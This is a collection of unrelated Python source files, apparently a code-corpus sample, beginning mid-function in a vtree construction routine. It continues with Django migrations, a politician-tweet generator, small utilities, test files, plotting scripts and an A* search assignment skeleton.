int_trees[var] = int_tree
return int_tree
elif len(trees) == 2:
int_tree = IntTreeSplit(var, trees[0], trees[1])
int_trees[var] = int_tree
return int_tree
else:
int_tree = IntTreeParallel(var, trees)
int_trees[var] = int_tree
return int_tree
indices = []
for index, var in enumerate(ordering):
if int_trees.get(var, None) is None:
indices.append(index)
_construct_int_tree(var, index)
if len(indices) == 1:
int_tree = int_trees[ordering[0]]
else:
int_tree = IntTreeParallel(var=None, trees=[int_trees[ordering[var_index]] for var_index in indices])
return int_tree.create_vtree(logic2cont.keys(), logic2cont)
def topdown_minfill_shuffle(literals: LiteralInfo) -> Vtree:
"""
Create a vtree by using a top-down min-fill approach, shuffling the input order.
:param literals: The context to create a vtree for.
:return: A vtree based on a top-down min-fill ordering, shuffling the input order
"""
logic2cont, cont2logic = conversion_tables(literals)
# Randomize
continuous_vars = list(cont2logic.keys())
random.shuffle(continuous_vars)
co_occurrences = list(logic2cont.values())
random.shuffle(co_occurrences)
# Create ordering
primal = create_interaction_graph_from_literals(cont2logic.keys(), logic2cont.values(), True, False)
primal.compute_fills()
ordering = []
neighbor_sets = []
while primal.nb_fills() > 0:
minfills = primal.get_minfills()
selected_var = minfills[random.randint(0, len(minfills) - 1)]
ordering.append(selected_var)
neighbor_sets.append(primal.connected_to[selected_var])
primal.remove_and_process_node(selected_var)
ordering.reverse()
if len(ordering) == 0:
return balanced(literals)
# Create induced graph
primal = create_interaction_graph_from_literals(cont2logic.keys(), logic2cont.values(), True, False)
for neighbors in neighbor_sets: # for each var
primal.add_edges(neighbors)
# Construct pseudo tree by depth first traversing the induced graph
assert len(ordering) > 0
int_trees: Dict[any, IntTree] = dict()
def _construct_int_tree(var, index):
""" Construct int_tree depth-first """
if int_trees.get(var, None) is not None: # Because then already covered
return None
neighbors = primal.connected_to[var]
children = list(_sort_to_ordering(ordering, neighbors, index))
if len(children) == 0:
int_tree = IntTreeVar(var)
int_trees[var] = int_tree
return int_tree
else:
trees = [_construct_int_tree(child_var, child_index) for (child_index, child_var) in children]
trees = [tree for tree in trees if tree is not None]
assert len(trees) >= 1
if len(trees) == 1:
int_tree = IntTreeLine(var, trees[0])
int_trees[var] = int_tree
return int_tree
elif len(trees) == 2:
int_tree = IntTreeSplit(var, trees[0], trees[1])
int_trees[var] = int_tree
return int_tree
else:
int_tree = IntTreeParallel(var, trees)
int_trees[var] = int_tree
return int_tree
indices = []
for index, var in enumerate(ordering):
if int_trees.get(var, None) is None:
indices.append(index)
_construct_int_tree(var, index)
if len(indices) == 1:
int_tree = int_trees[ordering[0]]
else:
int_tree = IntTreeParallel(var=None, trees=[int_trees[ordering[var_index]] for var_index in indices])
# Randomize some more
logic_variables = list(logic2cont.keys())
random.shuffle(logic_variables)
return int_tree.create_vtree(logic2cont.keys(), logic2cont)
|
from twitter_handler import TwitterHandler
import tweet_maker
import config_manager
from os import path, listdir
import argparse
def run():
parser = argparse.ArgumentParser(description='Generate Israeli politicians\' tweets')
parser.add_argument('-f', '--fetch', action='store_true', help='Fetch original tweets (default: False)')
parser.add_argument('-p', '--post', action='store_true', help='Post new tweets (default: False)')
args = parser.parse_args()
config = config_manager.get_config('general')
original_tweets_dir = config['original_tweets_dir']
new_tweets_file = config['new_tweets_file']
if args.fetch:
tweeter_handler = TwitterHandler()
tweeter_handler.fetch_all(original_tweets_dir)
twitter_users = config_manager.get_config('twitter_users')
combined_model = None
with open(new_tweets_file, 'w', encoding='utf8') as output:
for filename in listdir(original_tweets_dir):
with open(path.join(original_tweets_dir, filename), encoding='utf8') as f:
original_tweets = f.read()
new_tweets, model = tweet_maker.make_tweets_from_text(original_tweets, 10)
combined_model = tweet_maker.combine(combined_model, model)
output_tweets(new_tweets, filename, twitter_users[filename], output)
new_combined_tweets = tweet_maker.make_tweets_from_model(combined_model, 20)
output_tweets(new_combined_tweets, config['bot_screen_name'], config['bot_name'], output)
def output_tweets(tweets, handle, name, output):
for new_tweet in tweets:
if not new_tweet:
continue
final_new_tweet = '{name} ({handle}): {tweet}'.format(name=name, handle=handle, tweet=new_tweet)
output.write(final_new_tweet + '\n')
output.write('\n')
if __name__ == '__main__':
run()
|
# Generated by Django 3.1.3 on 2021-01-04 01:16
from django.db import migrations, models
import django.db.models.deletion
import users.models
class Migration(migrations.Migration):
dependencies = [
('users', '0018_profile_rm'),
]
operations = [
migrations.CreateModel(
name='PlanProfileVersion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('version', models.IntegerField(default=1)),
('content', models.TextField(blank=True, null=True)),
],
),
migrations.RemoveField(
model_name='matchrequest',
name='friend_request',
),
migrations.RemoveField(
model_name='planprofile',
name='content',
),
migrations.AddField(
model_name='planprofile',
name='latest',
field=models.IntegerField(default=1),
),
migrations.AlterField(
model_name='profile',
name='graduate_year',
field=models.CharField(blank=True, choices=[('2018', '2018'), ('2019', '2019'), ('2020', '2020'), ('2021', '2021'), ('2022', '2022'), ('2023', '2023'), ('2024', '2024'), ('2025', '2025')], max_length=255),
),
migrations.DeleteModel(
name='MatchingHistory',
),
migrations.DeleteModel(
name='MatchRequest',
),
migrations.AddField(
model_name='planprofileversion',
name='plan_profile',
field=models.ForeignKey(default=users.models.get_plan_profile, on_delete=django.db.models.deletion.CASCADE, to='users.planprofile'),
),
]
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('hmda', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='hmdarecord',
name='as_of_year',
field=models.PositiveIntegerField(help_text=b'The reporting year of the HMDA record.', db_index=True),
),
]
|
class ProgressBar:
PROGRESS_CHARS = [u"\u2600", u"\u2601", u"\u2602", u"\u2603", u"\u2604"]
def __init__(self, max, num_chars, pixels_in_char):
self.max = max
self.value = 0
self.total_pixels = num_chars * pixels_in_char
self.pixels_in_char = pixels_in_char
self.string = ""
self.pixels_to_draw = 0
self.update = True
self.set_value(0)
def set_value(self, value):
self.value = value
if self.max > 0:
pixels_to_draw = value * self.total_pixels / self.max
else:
pixels_to_draw = self.total_pixels
if self.pixels_to_draw != pixels_to_draw:
self.pixels_to_draw = pixels_to_draw
self.string = ""
for i in range(0, pixels_to_draw / self.pixels_in_char):
self.string += ProgressBar.PROGRESS_CHARS[self.pixels_in_char - 1]
rest = pixels_to_draw % self.pixels_in_char
if rest > 0:
self.string += ProgressBar.PROGRESS_CHARS[rest - 1]
self.update = True
def set_max(self, max):
self.max = max
self.set_value(self.value)
def get_string(self):
self.update = False
return self.string
|
import pytest
import webull
# pip install -U pytest
# python -m pytest -s
class TestUserClass:
def test_login(self):
webull_obj = webull.webull()
assert True == webull_obj.login_prompt()
def test_logout(self):
webull_obj = webull.webull()
print("Login success: {}".format(webull_obj.login_prompt()))
assert True == webull_obj.logout()
|
n = int(input())
answer = n*(n+1)*(n+2)//6
for i in range(n-1):
u = list(map(int,input().split()))
answer -= min(u)*(n-max(u)+1)
print(answer) |
class Solution:
def subtractProductAndSum(self, n: int) -> int:
s, p = 0, 1
while n:
n, d = divmod(n, 10)
s+=d
p*=d
return p - s
|
"""
Tool to replace underscore by spaces
"""
import argparse
import os
__version__ = '0.0.1'
def parse_args():
parser = argparse.ArgumentParser(description="Rename file")
group = parser.add_mutually_exclusive_group()
parser.add_argument("file", help="taking filename", type=str, nargs='+')
group.add_argument("-s", "--space", action="store_true")
group.add_argument("-r", "--recursive", action="store_true")
return parser.parse_args()
def main():
args = parse_args()
new_filename = '_'.join(args.file)
filename = ' '.join(args.file)
if args.space:
new_filename = args.file[0].replace('_', ' ')
elif args.recursive:
for file in args.file:
os.rename(file, file.replace(' ', '_'))
else:
os.rename(filename, new_filename)
if __name__ == "__main__":
main()
|
"""This file is Only for debugging while running docker in dev mode. docker will not run this file if in production mode."""
import logging
from app.mainController import app
import ptvsd
logger = logging.getLogger('app.' + __name__) # make logger part of the 'app' module. (that is how to distinguish app logs with vendor module logs)
# start debugging
logger.critical('CRITICAL: RUNNING IN DEBUG MODE')
try:
ptvsd.enable_attach(address=('0.0.0.0', 8081))
except Exception as e:
logger.warning('DEBUGGING IS DISABLED. (make sure flask is running without debug mode (environment variable FLASK_DEBUG: 0)')
if __name__ == "__main__":
# below line set debug=False to enable debugging (I know its counterintuitive) but that will disable auto-reloading
# set debug=True to disable debugging but enable auto-reloading app
app.run(host="0.0.0.0", debug=True, port=8080)
|
import logging
import os
import random
import time
import click
import numpy as np
import seaborn as sns
from collate import COLLATION_PATH, HERE, SUMMARY_DIRECTORY, collate, read_collation
from pykeen_report import plot as pkp
logger = logging.getLogger(__name__)
def make_plots(
*,
target_header: str,
make_png: bool = True,
make_pdf: bool = True,
):
"""Collate all HPO results in a single table."""
df = read_collation()
for k in ['searcher', 'evaluator']:
if k in df.columns:
del df[k]
sns.set_style("whitegrid")
summary_1d_directory = os.path.join(SUMMARY_DIRECTORY, '1D-slices')
os.makedirs(summary_1d_directory, exist_ok=True)
pkp.write_1d_sliced_summaries(
df=df, target_header=target_header, output_directory=summary_1d_directory,
make_pdf=make_pdf, make_png=make_png,
)
with open(os.path.join(HERE, 'README.md'), 'w') as file:
print(f'# Ablation Results\n', file=file)
print(f'Output at {time.asctime()}\n', file=file)
for v in sorted(df['dataset'].unique()):
print(f'<img src="summary/1D-slices/dataset_{v}.png" alt="{v}"/>\n', file=file)
sns.set_style("darkgrid")
dataset_optimizer_directory = os.path.join(SUMMARY_DIRECTORY, 'dataset_optimizer_model_summary')
os.makedirs(dataset_optimizer_directory, exist_ok=True)
pkp.write_dataset_optimizer_model_summaries(
df=df, target_header=target_header, output_directory=dataset_optimizer_directory,
make_pdf=make_pdf, make_png=make_png,
)
pkp.write_1d_sliced_summaries_stratified(
df=df, target_header=target_header, output_directory=SUMMARY_DIRECTORY,
make_pdf=make_pdf, make_png=make_png,
)
pkp.write_2d_summaries(
df=df, target_header=target_header, output_directory=SUMMARY_DIRECTORY,
make_pdf=make_pdf, make_png=make_png,
)
sizeplot_dir = os.path.join(SUMMARY_DIRECTORY, 'sizeplots')
os.makedirs(sizeplot_dir, exist_ok=True)
pkp.make_sizeplots_trellised(
df=df,
target_x_header='model_bytes',
target_y_header=target_header,
output_directory=sizeplot_dir,
make_pdf=make_pdf, make_png=make_png,
)
@click.command()
def main():
key = 'hits@10'
if not os.path.exists(COLLATION_PATH):
collate(key)
# Plotting should be deterministic
np.random.seed(5)
random.seed(5)
make_plots(target_header=key)
click.echo('done!')
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
main()
|
# uncompyle6 version 3.4.1
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.16 (v2.7.16:413a49145e, Mar 2 2019, 14:32:10)
# [GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.57)]
# Embedded file name: /Users/versonator/Jenkins/live/output/mac_64_static/Release/python-bundle/MIDI Remote Scripts/_Framework/NotifyingControlElement.py
# Compiled at: 2019-04-09 19:23:45
from __future__ import absolute_import, print_function, unicode_literals
from .SubjectSlot import Subject, SubjectEvent
from .ControlElement import ControlElement
class NotifyingControlElement(Subject, ControlElement):
u"""
Class representing control elements that can send values
"""
__subject_events__ = (
SubjectEvent(name='value', doc=' Called when the control element receives a MIDI value\n from the hardware '),) |
from enum import Enum
RUN = 'run'
LISTEN = 'listen'
READ = 'read'
CLEAR = 'clear'
ASYNC = 'async'
class Mode(Enum):
RUN = 1
LISTEN = 2
READ = 4
CLEAR = 8
class Options:
def __init__(self):
self.mode = Mode.RUN
self.async = False
self.save = False
self.print = False
def __str__(self):
return str(self.__class__) + ": " + str(self.__dict__)
|
# Generated by Django 3.2.6 on 2021-11-30 01:51
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('report_system', '0002_work_order'),
]
operations = [
migrations.AlterField(
model_name='work_order',
name='end_time',
field=models.DateTimeField(blank=True, default=datetime.datetime.now, help_text='結束時間', null=True, verbose_name='結束時間'),
),
migrations.AlterField(
model_name='work_order',
name='start_time',
field=models.DateTimeField(blank=True, default=datetime.datetime.now, help_text='開始時間', null=True, verbose_name='開始時間'),
),
]
|
from intervals import (
AbstractInterval, canonicalize, CharacterInterval,
DateInterval, DateTimeInterval, DecimalInterval,
FloatInterval, Interval, IntervalFactory,
IntInterval, NumberInterval, IllegalArgument,
IntervalException, RangeBoundsException
)
__all__ = [
'AbstractInterval', 'CharacterInterval', 'canonicalize',
'DateInterval', 'DateTimeInterval', 'DecimalInterval',
'FloatInterval', 'Interval', 'IntervalException',
'IntervalFactory', 'IntInterval', 'IllegalArgument',
'NumberInterval', 'RangeBoundsException'
]
from flex.datastructures.enum import IntEnum
from flex.utils.decorators import export
class IntervalFlags(IntEnum):
LEFT_OPEN = 1 << 0 # 0001 == 1
RIGHT_OPEN = 1 << 1 # 0010 == 2
OPEN = LEFT_OPEN | RIGHT_OPEN # 0011 == 3
LEFT_UNBOUND = LEFT_OPEN | 1 << 2 # 0101 == 5
RIGHT_UNBOUND = RIGHT_OPEN | 1 << 3 # 1010 == 10
UNBOUND = LEFT_UNBOUND | RIGHT_UNBOUND # 1111 == 12
# LEFT_CLOSED = ~LEFT_OPEN & ~LEFT_UNBOUND #
# RIGHT_CLOSED = ~RIGHT_OPEN & ~RIGHT_UNBOUND #
# CLOSED = ~OPEN & ~UNBOUND #
LEFT_CLOSED = 1 << 0 # 0001 = 1
RIGHT_CLOSED = 1 << 1 # 0010 = 2
CLOSED = LEFT_CLOSED | RIGHT_CLOSED # 0011 = 3
LEFT_BOUND = 1 << 2 # 0100 == 4
RIGHT_BOUND = 1 << 3 # 1000 == 8
BOUND = LEFT_BOUND | RIGHT_BOUND # 1100 == 12
FIXED = 1 << 4
# def test_flags():
# testTrue(LEFT_UNBOUND, LEFT_OPEN, '&', LEFT_UNBOUND & LEFT_OPEN)
# testTrue(RIGHT_UNBOUND, RIGHT_OPEN, '&', RIGHT_UNBOUND & RIGHT_OPEN)
# testTrue(UNBOUND, OPEN, '&', UNBOUND & OPEN)
# echo(f='hr').br()
# testFalse(
# (LEFT_CLOSED | LEFT_UNBOUND),
# LEFT_UNBOUND, '&',
# (LEFT_CLOSED | LEFT_UNBOUND) & LEFT_UNBOUND,
# '(%s | %s)' % (LEFT_CLOSED, LEFT_UNBOUND)
# )
# testFalse(LEFT_CLOSED, LEFT_UNBOUND, '&', LEFT_CLOSED & LEFT_UNBOUND)
# testFalse(RIGHT_CLOSED, RIGHT_UNBOUND, '&', RIGHT_CLOSED & RIGHT_UNBOUND)
# testFalse(CLOSED, UNBOUND, '&', CLOSED & UNBOUND)
# echo(f='hr').br()
# testFalse(LEFT_CLOSED, LEFT_UNBOUND, '&', LEFT_CLOSED & LEFT_UNBOUND)
# def testTrue(v1, v2, op, res, exp1=None, exp2=None, reverse=False):
# exp1 = exp1 or v1
# exp2 = exp2 or v2
# # passed = not res if reverse else res
# color = '' if (not res if reverse else res) else 'red,bold'
# title = ('%s %s %s' % (exp1, op, exp2)).replace('IntervalFlags.', '')
# title = re.sub(r'([A-Z][\w]+\.)([A-Z][A-Z0-9_]+)', r'\2', '%s %s %s' % (exp1, op, exp2))
# pl, ll, lt = -24, 18, max(len(title)+4, 44)
# echo('', title, ' ', f=color).br()\
# ('-'*lt, f=color).br()\
# (pad('%d' % v1, pl))('=')(bits(v1), f='bold').br()\
# (pad('%d' % v2, pl))('=')(bits(v2), f='bold').br()\
# (' '*(-pl-4), '-'*ll, f=color).br()\
# (pad('%d %s %d' % (v1, op, v2), pl))('=')\
# (bits(res), f='bold,yellow')('=')\
# ('%d' % res).br().br()\
# # (' ', '='*ll, f=color).br().br()
# def testFalse(v1, v2, op, res, exp1=None, exp2=None):
# return testTrue(v1, v2, op, res, exp1, exp2, reverse=True)
# def _flags_2_global():
# g = globals()
# for f in IntervalFlags:
# g[f.name] = f
# _flags_2_global()
# del _flags_2_global
# import re
# from flex.helpers import uzi
# from flex.helpers.uzi import pad
# from flex.utils.echo import echo
# def bits(v, s=8, p=None, glen=4, gsep='-'):
# p, v = p or s, int(v)
# while abs(v) > 2**p:
# p *= 2
# regex = re.compile(r'([01%(gsep)s]{%(glen)d,})([01]{%(glen)d})' % dict(gsep=re.escape(gsep), glen=glen))
# return regex.sub(r'\1%s\2' % gsep, ('{0:0%sb}' % p).format(v))
# echo('Intervals', f='hr,bold,green').br().br()
# test_flags()
# echo.br()(f='hr,green,bold').br()
|
QUOTE = "'"
def split_quoted(s):
"""Split a string with quotes, some possibly escaped, into a list of
alternating quoted and unquoted segments. Raises a ValueError if there are
unmatched quotes.
Both the first and last entry are unquoted, but might be empty, and
therefore the length of the resulting list must be an odd number.
"""
result = []
for part in s.split(QUOTE):
if result and result[-1].endswith('\\'):
result[-1] = result[-1] + QUOTE + part
else:
result.append(part)
if not len(result) % 2:
raise ValueError('Unmatched quote.')
return result
def process_unquoted(s, sub):
"""Splits a string into unquoted and quoted segments, applies a substitution
function to the unquoted segments only, and joins it back together again.
"""
def gen():
*parts, last = split_quoted(s)
for unquoted, quoted in zip(*([iter(parts)] * 2)):
yield sub(unquoted)
yield QUOTE + quoted + QUOTE
yield sub(last)
return ''.join(gen())
|
# coding=utf-8
# Copyright 2018-2020 EVA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import List
from eva.catalog.models.df_column import DataFrameColumn
from eva.catalog.services.base_service import BaseService
class DatasetColumnService(BaseService):
def __init__(self):
super().__init__(DataFrameColumn)
def columns_by_dataset_id_and_names(self, dataset_id, column_names):
result = self.model.query \
.with_entities(self.model._id) \
.filter(self.model._metadata_id == dataset_id,
self.model._name.in_(column_names)) \
.all()
return [res[0] for res in result]
def columns_by_id_and_dataset_id(self,
dataset_id: int,
id_list: List[int] = None):
"""return all the columns that matches id_list and dataset_id
Arguments:
dataset_id {int} -- [metadata id of the table]
id_list {List[int]} -- [metadata ids of the required columns: If
None return all the columns that matches the dataset_id]
Returns:
List[self.model] -- [the filtered self.models]
"""
if id_list is not None:
return self.model.query \
.filter(self.model._metadata_id == dataset_id,
self.model._id.in_(id_list)) \
.all()
return self.model.query \
.filter(self.model._metadata_id == dataset_id) \
.all()
def create_column(self, column_list):
saved_column_list = []
for column in column_list:
saved_column_list.append(column.save())
return saved_column_list
|
from framework import *
from problems import *
from matplotlib import pyplot as plt
import numpy as np
from typing import List, Union, Optional
# Load the streets map
streets_map = StreetsMap.load_from_csv(Consts.get_data_file_path("tlv_streets_map.csv"))
# Make sure that the whole execution is deterministic.
# This is important, because we expect to get the exact same results
# in each execution.
Consts.set_seed()
def plot_distance_and_expanded_wrt_weight_figure(
problem_name: str,
weights: Union[np.ndarray, List[float]],
total_cost: Union[np.ndarray, List[float]],
total_nr_expanded: Union[np.ndarray, List[int]]):
"""
Use `matplotlib` to generate a figure of the distance & #expanded-nodes
w.r.t. the weight.
TODO [Ex.15]: Complete the implementation of this method.
"""
weights, total_cost, total_nr_expanded = np.array(weights), np.array(total_cost), np.array(total_nr_expanded)
assert len(weights) == len(total_cost) == len(total_nr_expanded)
assert len(weights) > 0
is_sorted = lambda a: np.all(a[:-1] <= a[1:])
assert is_sorted(weights)
fig, ax1 = plt.subplots()
# TODO: Plot the total distances with ax1. Use `ax1.plot(...)`.
# TODO: Make this curve colored blue with solid line style.
# TODO: Set its label to be 'Solution cost'.
# See documentation here:
# https://matplotlib.org/api/_as_gen/matplotlib.axes.Axes.plot.html
# You can also Google for additional examples.
raise NotImplementedError # TODO: remove this line!
p1, = ax1.plot(...) # TODO: pass the relevant params instead of `...`.
# ax1: Make the y-axis label, ticks and tick labels match the line color.
ax1.set_ylabel('Solution cost', color='b')
ax1.tick_params('y', colors='b')
ax1.set_xlabel('weight')
# Create another axis for the #expanded curve.
ax2 = ax1.twinx()
# TODO: Plot the total expanded with ax2. Use `ax2.plot(...)`.
# TODO: Make this curve colored red with solid line style.
# TODO: Set its label to be '#Expanded states'.
raise NotImplementedError # TODO: remove this line!
p2, = ax2.plot(...) # TODO: pass the relevant params instead of `...`.
# ax2: Make the y-axis label, ticks and tick labels match the line color.
ax2.set_ylabel('#Expanded states', color='r')
ax2.tick_params('y', colors='r')
curves = [p1, p2]
ax1.legend(curves, [curve.get_label() for curve in curves])
fig.tight_layout()
plt.title(f'Quality vs. time for wA* \non problem {problem_name}')
plt.show()
def run_astar_for_weights_in_range(heuristic_type: HeuristicFunctionType, problem: GraphProblem, n: int = 30,
max_nr_states_to_expand: Optional[int] = 40_000,
low_heuristic_weight: float = 0.5, high_heuristic_weight: float = 0.95):
# TODO [Ex.15]:
# 1. Create an array of `n` numbers equally spread in the segment
# [low_heuristic_weight, high_heuristic_weight]
# (including the edges). You can use `np.linspace()` for that.
# 2. For each weight in that array run the wA* algorithm, with the
# given `heuristic_type` over the given problem. For each such run,
# if a solution has been found (res.is_solution_found), store the
# cost of the solution (res.solution_g_cost), the number of
# expanded states (res.nr_expanded_states), and the weight that
# has been used in this iteration. Store these in 3 lists (list
# for the costs, list for the #expanded and list for the weights).
# These lists should be of the same size when this operation ends.
# Don't forget to pass `max_nr_states_to_expand` to the AStar c'tor.
# 3. Call the function `plot_distance_and_expanded_wrt_weight_figure()`
# with these 3 generated lists.
raise NotImplementedError # TODO: remove this line!
# --------------------------------------------------------------------
# ------------------------ StreetsMap Problem ------------------------
# --------------------------------------------------------------------
def toy_map_problem_experiments():
print()
print('Solve the map problem.')
# Ex.10
# TODO: Just run it and inspect the printed result.
toy_map_problem = MapProblem(streets_map, 54, 549)
uc = UniformCost()
res = uc.solve_problem(toy_map_problem)
print(res)
# Ex.12
# TODO: create an instance of `AStar` with the `NullHeuristic`,
# solve the same `toy_map_problem` with it and print the results (as before).
# Notice: AStar constructor receives the heuristic *type* (ex: `MyHeuristicClass`),
# and NOT an instance of the heuristic (eg: not `MyHeuristicClass()`).
exit() # TODO: remove!
# Ex.13
# TODO: create an instance of `AStar` with the `AirDistHeuristic`,
# solve the same `toy_map_problem` with it and print the results (as before).
exit() # TODO: remove!
# Ex.15
# TODO:
# 1. Complete the implementation of the function
# `run_astar_for_weights_in_range()` (upper in this file).
# 2. Complete the implementation of the function
# `plot_distance_and_expanded_wrt_weight_figure()`
# (upper in this file).
# 3. Call here the function `run_astar_for_weights_in_range()`
# with `AirDistHeuristic` and `toy_map_problem`.
exit() # TODO: remove!
# --------------------------------------------------------------------
# ---------------------------- MDA Problem ---------------------------
# --------------------------------------------------------------------
loaded_problem_inputs_by_size = {}
loaded_problems_by_size_and_opt_obj = {}
def get_mda_problem(
problem_input_size: str = 'small',
optimization_objective: MDAOptimizationObjective = MDAOptimizationObjective.Distance):
if (problem_input_size, optimization_objective) in loaded_problems_by_size_and_opt_obj:
return loaded_problems_by_size_and_opt_obj[(problem_input_size, optimization_objective)]
assert problem_input_size in {'small', 'moderate', 'big'}
if problem_input_size not in loaded_problem_inputs_by_size:
loaded_problem_inputs_by_size[problem_input_size] = MDAProblemInput.load_from_file(
f'{problem_input_size}_mda.in', streets_map)
problem = MDAProblem(
problem_input=loaded_problem_inputs_by_size[problem_input_size],
streets_map=streets_map,
optimization_objective=optimization_objective)
loaded_problems_by_size_and_opt_obj[(problem_input_size, optimization_objective)] = problem
return problem
def basic_mda_problem_experiments():
print()
print('Solve the MDA problem (small input, only distance objective, UniformCost).')
small_mda_problem_with_distance_cost = get_mda_problem('small', MDAOptimizationObjective.Distance)
# Ex.18
# TODO: create an instance of `UniformCost`, solve the `small_mda_problem_with_distance_cost`
# with it and print the results.
exit() # TODO: remove!
def mda_problem_with_astar_experiments():
print()
print('Solve the MDA problem (moderate input, only distance objective, A*, '
'MaxAirDist & SumAirDist & MSTAirDist heuristics).')
moderate_mda_problem_with_distance_cost = get_mda_problem('moderate', MDAOptimizationObjective.Distance)
# Ex.22
# TODO: create an instance of `AStar` with the `MDAMaxAirDistHeuristic`,
# solve the `moderate_mda_problem_with_distance_cost` with it and print the results.
exit() # TODO: remove!
# Ex.25
# TODO: create an instance of `AStar` with the `MDASumAirDistHeuristic`,
# solve the `moderate_mda_problem_with_distance_cost` with it and print the results.
exit() # TODO: remove!
# Ex.28
# TODO: create an instance of `AStar` with the `MDAMSTAirDistHeuristic`,
# solve the `moderate_mda_problem_with_distance_cost` with it and print the results.
exit() # TODO: remove!
def mda_problem_with_weighted_astar_experiments():
print()
print('Solve the MDA problem (small & moderate input, only distance objective, wA*).')
small_mda_problem_with_distance_cost = get_mda_problem('small', MDAOptimizationObjective.Distance)
moderate_mda_problem_with_distance_cost = get_mda_problem('moderate', MDAOptimizationObjective.Distance)
# Ex.30
# TODO: Call here the function `run_astar_for_weights_in_range()`
# with `MDAMSTAirDistHeuristic`
# over the `small_mda_problem_with_distance_cost`.
exit() # TODO: remove!
# Ex.30
# TODO: Call here the function `run_astar_for_weights_in_range()`
# with `MDASumAirDistHeuristic`
# over the `moderate_mda_problem_with_distance_cost`.
exit() # TODO: remove!
def monetary_cost_objectives_mda_problem_experiments():
print()
print('Solve the MDA problem (monetary objectives).')
small_mda_problem_with_monetary_cost = get_mda_problem('small', MDAOptimizationObjective.Monetary)
moderate_mda_problem_with_monetary_cost = get_mda_problem('moderate', MDAOptimizationObjective.Monetary)
# Ex.32
# TODO: create an instance of `UniformCost`
# solve the `small_mda_problem_with_monetary_cost` with it and print the results.
exit() # TODO: remove!
# Ex.32
# TODO: create an instance of `UniformCost`
# solve the `moderate_mda_problem_with_monetary_cost` with it and print the results.
exit() # TODO: remove!
def multiple_objectives_mda_problem_experiments():
print()
print('Solve the MDA problem (moderate input, distance & tests-travel-distance objectives).')
moderate_mda_problem_with_distance_cost = get_mda_problem('moderate', MDAOptimizationObjective.Distance)
moderate_mda_problem_with_tests_travel_dist_cost = get_mda_problem('moderate', MDAOptimizationObjective.TestsTravelDistance)
# Ex.35
# TODO: create an instance of `AStar` with the `MDATestsTravelDistToNearestLabHeuristic`,
# solve the `moderate_mda_problem_with_tests_travel_dist_cost` with it and print the results.
exit() # TODO: remove!
# Ex.38
# TODO: Implement the algorithm A_2 described in this exercise in the assignment instructions.
# Create an instance of `AStar` with the `MDAMSTAirDistHeuristic`.
# Solve the `moderate_mda_problem_with_distance_cost` with it and store the solution's (optimal)
# distance cost to the variable `optimal_distance_cost`.
# Calculate the value (1 + eps) * optimal_distance_cost in the variable `max_distance_cost` (for eps=0.6).
# Create another instance of `AStar` with the `MDATestsTravelDistToNearestLabHeuristic`, and specify the
# param `open_criterion` (to AStar c'tor) to be the criterion mentioned in the A_2 algorithm in the
# assignment instructions. Use a lambda function for that. This function should receive a `node` and
# has to return whether to add this just-created-node to the `open` queue.
# Remember that in python you can pass an argument to a function's parameter by the parameter's name
# `some_func(argument_name=some_value)`. This becomes especially relevant when you want to leave some
# previous parameters with their default values and pass an argument to a parameter that is positioned
# elsewhere next.
# Solve the `moderate_mda_problem_with_tests_travel_dist_cost` with it and print the results.
exit() # TODO: remove!
def mda_problem_with_astar_epsilon_experiments():
print()
print('Solve the MDA problem (small input, distance objective, using A*eps, use non-acceptable '
'heuristic as focal heuristic).')
small_mda_problem_with_distance_cost = get_mda_problem('small', MDAOptimizationObjective.Distance)
# Firstly solve the problem with AStar & MST heuristic for having a reference for #devs.
astar = AStar(MDAMSTAirDistHeuristic)
res = astar.solve_problem(small_mda_problem_with_distance_cost)
print(res)
def within_focal_h_sum_priority_function(node: SearchNode, problem: GraphProblem, solver: AStarEpsilon):
if not hasattr(solver, '__focal_heuristic'):
setattr(solver, '__focal_heuristic', MDASumAirDistHeuristic(problem=problem))
focal_heuristic = getattr(solver, '__focal_heuristic')
return focal_heuristic.estimate(node.state)
# Ex.43
# Try using A*eps to improve the speed (#dev) with a non-acceptable heuristic.
# TODO: Create an instance of `AStarEpsilon` with the `MDAMSTAirDistHeuristic`.
# Solve the `small_mda_problem_with_distance_cost` with it and print the results.
# Use focal_epsilon=0.23, and max_focal_size=40.
# Use within_focal_priority_function=within_focal_h_sum_priority_function. This function
# (defined just above) is internally using the `MDASumAirDistHeuristic`.
exit() # TODO: remove!
def mda_problem_anytime_astar_experiments():
print()
print('Solve the MDA problem (moderate input, only distance objective, Anytime-A*, '
'MSTAirDist heuristics).')
moderate_mda_problem_with_distance_cost = get_mda_problem('moderate', MDAOptimizationObjective.Distance)
# Ex.46
# TODO: create an instance of `AnytimeAStar` once with the `MDAMSTAirDistHeuristic`, with
# `max_nr_states_to_expand_per_iteration` set to 1000, solve the
# `moderate_mda_problem_with_distance_cost` with it and print the results.
exit() # TODO: remove!
def run_all_experiments():
print('Running all experiments')
toy_map_problem_experiments()
basic_mda_problem_experiments()
mda_problem_with_astar_experiments()
mda_problem_with_weighted_astar_experiments()
monetary_cost_objectives_mda_problem_experiments()
multiple_objectives_mda_problem_experiments()
mda_problem_with_astar_epsilon_experiments()
mda_problem_anytime_astar_experiments()
if __name__ == '__main__':
run_all_experiments()
|
from pytest_allclose import report_rmses
from nengo.rc import rc
def pytest_runtest_setup(item):
rc.reload_rc([])
rc["decoder_cache"]["enabled"] = "False"
rc["exceptions"]["simplified"] = "False"
rc["nengo.Simulator"]["fail_fast"] = "True"
rc["progress"]["progress_bar"] = "False"
def pytest_terminal_summary(terminalreporter):
report_rmses(terminalreporter)
|
# Generated by Django 3.0.3 on 2020-04-12 09:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('backend', '0010_auto_20200408_2203'),
]
operations = [
migrations.CreateModel(
name='Resolution',
